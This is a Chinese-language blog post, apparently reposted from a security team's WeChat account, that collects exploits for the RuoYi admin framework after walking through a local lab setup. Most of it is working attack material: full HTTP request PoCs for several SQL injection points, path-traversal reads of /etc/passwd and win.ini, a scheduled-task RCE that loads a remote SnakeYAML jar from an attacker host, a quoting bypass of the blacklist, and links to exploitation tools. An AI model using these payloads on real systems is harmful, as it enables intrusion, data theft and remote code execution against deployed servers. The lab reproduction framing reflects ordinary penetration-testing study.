首先上若依官网下载源码,官网地址:https://gitee.com/y_project/RuoYi 我选择下载使用的ruoyi V4.51、安装MySQL数据库。在本地安装MySQL数据库,我使用的是MySQL8.0.23版本,建议使用新版MySQL,使用MySQL5.几的版本导入若依sql文件会报错。MySQL安装教程请自行搜索。2、导入若依的sql文件若依源码根目录下有一个名为sql的目录,该目录下有两个sql文件。有两种方式进行导入。
(1)使用navicat连接本地MySQL8数据库。首先新建一个名为ry的数据库。
选中ry数据库,点击鼠标右键,选择运行SQL文件
(2)使用IDEA进行数据文件的导入首先使用idea新建一个MySQL数据源
使用IDEA开启一个MySQL控制台,然后再控制台中使用执行以下sql语句新建数据库
ry:
create
database
ry;
选中新建的ry数据库,然后新建一个MySQL控制台,然后将若依自带的两个sql文件中的内容粘贴到控制台中进行执行即可。
3、修改若依配置文件中的MySQL数据库的账号密码。
4、使用idea启动若依项目即可,若依服务默认在本地的80端口。
出现上图的图标就证明若依正常运行。使用浏览器访问若依后台管理系统,页面如下:
若依前台默认shiro key命令执行漏洞
漏洞简介
若依默认使用shiro组件,所以可以试试shiro经典的rememberMe漏洞来getshell。
漏洞复现
直接使用Liqunkit工具梭哈
若依后台存在多处sql注入漏洞
漏洞简介
若依后台存在多个SQL注入点
漏洞复现
进入后台后,拦截角色管理页面的请求包
POC:
POST
/system/role/list
HTTP/1.1
Host
: 127.0.0.1
Content-Length
: 179
sec-ch-ua
: "Chromium";v="109", "Not_A Brand";v="99"
Accept
: application/json, text/javascript, */*; q=0.01
Content-Type
: application/x-www-form-urlencoded
X-Requested-With
: XMLHttpRequest
sec-ch-ua-mobile
: ?0
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform
: "Windows"
Origin
: http://127.0.0.1
Sec-Fetch-Site
: same-origin
Sec-Fetch-Mode
: cors
Sec-Fetch-Dest
: empty
Referer
: http://127.0.0.1/system/role
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection
: close
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&
params
[beginTime]=&
params
[endTime]=&
params
[dataScope]=
and
extractvalue
(
1
,concat(
0x7e
,(
select
database(
)),0x7e))
第二个sql注入点:角色编辑接口POC:
POST
/system/dept/edit
HTTP/1.1
Host
: 127.0.0.1
Content-Length
: 111
sec-ch-ua
: "Chromium";v="109", "Not_A Brand";v="99"
Accept
: application/json, text/javascript, */*; q=0.01
Content-Type
: application/x-www-form-urlencoded
X-Requested-With
: XMLHttpRequest
sec-ch-ua-mobile
: ?0
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform
: "Windows"
Origin
: http://127.0.0.1
Sec-Fetch-Site
: same-origin
Sec-Fetch-Mode
: cors
Sec-Fetch-Dest
: empty
Referer
: http://127.0.0.1/system/role
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection
: close
DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((
select
user
()))));
#
第三个sql注入点POC:
POST
/system/role/export
HTTP/1.1
Host
: 127.0.0.1
Content-Length
: 75
sec-ch-ua
: "Chromium";v="109", "Not_A Brand";v="99"
Accept
: application/json, text/javascript, */*; q=0.01
Content-Type
: application/x-www-form-urlencoded
X-Requested-With
: XMLHttpRequest
sec-ch-ua-mobile
: ?0
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform
: "Windows"
Origin
: http://127.0.0.1
Sec-Fetch-Site
: same-origin
Sec-Fetch-Mode
: cors
Sec-Fetch-Dest
: empty
Referer
: http://127.0.0.1/system/role
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection
: close
params
[dataScope]=
and
extractvalue
(
1
,concat(
0x7e
,(
select
database(
)),0x7e))
RuoYi4.7.5版本后台sql注入
ruoyi-4.7.5 后台 com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入
POC:
sql=
CREATE
table
ss1
as
SELECT
/**/
*
FROM
sys_job
WHERE
1
=
1
union
/**/
SELECT
/**/
extractvalue(
1
,
concat
(
0x7e
,(
select
/**/
version
()),
0x7e
));
若依后台任意文件读取(CNVD-2021-01931)
漏洞简介
若依管理系统是基于springboot的权限管理系统,登录后台后可以读取服务器上的任意文件。影响版本:RuoYi<4.5.1
漏洞复现
POC:
/common/download/resource?resource=
/profile/
../../../../etc/passwd/common/download/resource?resource=
/profile/
../../../../Windows/win.ini
读取了D盘下的1.txt文件
若依后台定时任务RCE
漏洞简介
由于若依后台计划任务处,对于传入的“调用目标字符串”没有任何校验,导致攻击者可以调用任意类、方法及参数触发反射执行命令。影响版本:RuoYi<4.6.2
漏洞复现
下载payload:
https:
//github.com/artsploit/yaml-payload
下载完成之后我们修改一下 AwesomeScriptEngineFactory.java 这个文件
(mspaint为打开画图板)然后切换到yaml-payload-master目录编写yaml-payload.yml文件(如果没有自己创建)
然后在该目录下执行以下命令进行编译(java环境使用的是1.8)
javac src/artsploit/AwesomeScriptEngineFactory.java
//编译java文件
jar -cvf yaml-payload.jar -C src/ .
//打包成jar包
然后就会生成一个:yaml-payload.jar的jar包直接在yaml-payload-master目录下使用python起一个http服务。
python3
-m
http
.server
5555
然后进入若依后台,添加一个计划任务。
org.yaml.snakeyaml.Yaml.load(
'!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://攻击机ip/yaml-payload.jar"]]]]'
)
cron表达式:0/10 * * * * ?这个cron就跟linux定时任务一样,定义每天/每周/等,定时启动的时间配置好之后,并不会启动定时任务
计划任务启动之后,即可执行命令mspaint(弹出画图板)
版本4.6.2<=Ruoyi<4.7.2
这个版本采用了黑名单限制调用字符串
- 定时任务屏蔽ldap远程调用
- 定时任务屏蔽http(s)远程调用
- 定时任务屏蔽rmi远程调用
ypass咱们只需要在屏蔽的协议加上单引号,接着采用之前的方式例如: -
org
.yaml
.snakeyaml
.Yaml
.load
(‘!!
javax
.script
.ScriptEngineManager
[!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://127.0.0.1:88/yaml-payload.jar”]
]]]’)
- 加引号
若依后台任意文件下载漏洞
漏洞简介
若依管理系统后台存在任意文件下载漏洞。影响版本:若依管理系统4.7.6及以下版本
漏洞复现
漏洞利用前提:登录进后台。首先提交一个定时任务。
POST
/monitor/job/add
HTTP/1.1
Host
: 127.0.0.1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept
: application/json, text/javascript, */*; q=0.01
Accept-Language
: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With
: XMLHttpRequest
Content-Length
: 188
Connection
: close
Cookie
: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=61e79ae9-8cdd-4e51-baac-d269ef551df3
createBy
=admin&jobName=renwu&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile(
'c://windows/win.ini'
)&cronExpression=
0
%
2
F15+*+*+*+*+%
3
F&misfirePolicy=
1
&concurrent=
1
&status=
0
&remark=
通过浏览器直接get请求以下地址即可,下载任意文件。
http:
/
/127.0.0.1/common
/download/resource
?resource=
c:
/
/windows/win
.
ini:
.zip
若依框架综合利用工具推荐
若依漏洞利用工具
1
:
https:
/
/github.com/thelostworld
Free/Ruoyi-All
若依漏洞利用工具
2
:链接:
https:
/
/pan.baidu.com/s
/1yAUm6CP5uFpUwEqbYeXtCg?pwd=sazx提取码:sazx
原文始发于微信公众号(晨曦安全团队):【Web渗透】若依框架漏洞合集
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论